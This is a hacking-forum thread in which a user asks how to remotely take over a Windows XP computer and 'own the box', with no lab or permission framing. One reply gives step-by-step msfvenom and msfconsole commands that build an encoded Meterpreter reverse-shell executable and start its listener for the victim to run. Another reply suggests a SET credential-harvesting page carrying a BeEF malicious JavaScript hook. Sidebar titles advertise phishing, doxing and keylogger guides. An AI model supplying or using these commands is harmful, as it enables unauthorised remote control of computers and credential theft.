Hey guys this is thirdlion! I have a pretty good knowledge of computers. I have spent a decent amount of time trying to hack an old Windows XP computer with Metasploit. I have followed several how-tos but I have had no success. I am sure there are other hacking methods and tricks then just Metasploit. Could anyone point me to a tutorial?
Forum Thread: How Should I Start Hacking?
- Hot
- Active
-
Forum Thread: How to Hack Android Phone Using Same Wifi 28 Replies
13 hrs ago -
Forum Thread: How to Hack Wireless Password Through MAC Address and IP Address 25 Replies
4 days ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 50 Replies
1 wk ago -
Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone 18 Replies
3 wks ago -
Forum Thread: Mitm attack problem 2 Replies
4 wks ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 32 Replies
1 mo ago -
Metasploit Error: Handler Failed to Bind 40 Replies
1 mo ago -
Forum Thread: How to Know if You Are a Script Kiddie? 9 Replies
1 mo ago -
Forum Thread: How to Identify and Crack Hashes 8 Replies
1 mo ago -
Forum Thread: How to Hack School Website 8 Replies
1 mo ago -
Forum Thread: Whenever I Try "Airmon-Ng Start wlan0" There's an Error? 16 Replies
1 mo ago -
Forum Thread: How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux 14 Replies
1 mo ago -
Forum Thread: Awesome Keylogging Script - BeeLogger 30 Replies
2 mo ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 121 Replies
2 mo ago -
How to: Minecraft DoS'Ing with Python. 1 Replies
3 mo ago -
Forum Thread: Tools for Beginner Hacker 3 Replies
3 mo ago -
Forum Thread: How to Embed an Android Payload in an Image? 9 Replies
4 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 46 Replies
4 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 11 Replies
4 mo ago -
Forum Thread: Fix Initramfs Problem 5 Replies
4 mo ago
-
How To: Dox Anyone
-
Hacking macOS: How to Hide Payloads Inside Photo Metadata
-
How To: Hack Wi-Fi Networks with Bettercap
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
Steganography: How to Hide Secret Data Inside an Image or Audio File in Seconds
-
How To: Bypass File Upload Restrictions on Web Apps to Get a Shell
-
How To: Hack Android Using Kali (Remotely)
-
How To: 4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To: Use Google to Hack(Googledorks)
-
How To: Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASH
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
BT Recon: How to Snoop on Bluetooth Devices Using Kali Linux
-
How To: Spy on Traffic from a Smartphone with Wireshark
-
How To: Enumerate SMB with Enum4linux & Smbclient
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Create Custom Wordlists for Password Cracking Using the Mentalist
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
6 Responses
The point you are missing: To learn hacking, you shouldn't just see how to's. You need to really LEARN, not to decorate what you will do. Learn means have the knowledge to choose which method to do in each situation, and not know only one way, and get broken if it's anything different than the way you learned. I don't know whats your point with 'hacking', i don't know what you want to be or do, so, i can't point you anything, for now.
I would like to know how to gain remote access to a computers and own the box. I have spent a lot of time learning and nothing has worked. I am more then sure there are other ways to do this then just Metasploit. (Thats all that null byte teaches for hacking computers.) It would be helpful if you could give me some suggestions on were to start and what to learn!
Maybe you should try social engineering. It has been fun for me, and can be easier than exploiting sometimes. Look into using the Social Engineering Toolkit and BeeF. BeeF generates an html tag that activates malicious JavaScript, so to start maybe put that tag in a Credential Harvesting site made with SET.
Metasploit works just fine and if you can't "get it work", maybe you should try again.
It's probably the easiest way to exploit windows PC.
You don't need some ultra detailed tutorial on that.
Open a terminal and type :
msfvenom -p windows/meterpreter/reversetcp LHOST=yourip LPORT=443 -e cmd/powershell_base64 -f exe > root/Desktop/anything.exe
New terminal:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST youripagain
set LPORT 443
exploit
Now you need to run anything.exe on windows PC and that's it.
Ill try it thanks!
I agree with ~JESUS, you need to do a lot of research and not just follow HOW-TOs. What about metapsloit, make sure you enable port-forwarding on port 4444 and always put 4444 for LPORT. Hope it helped and try learning a programming language first, it will be easier to "hack" later on if you know programming languages.
Share Your Thoughts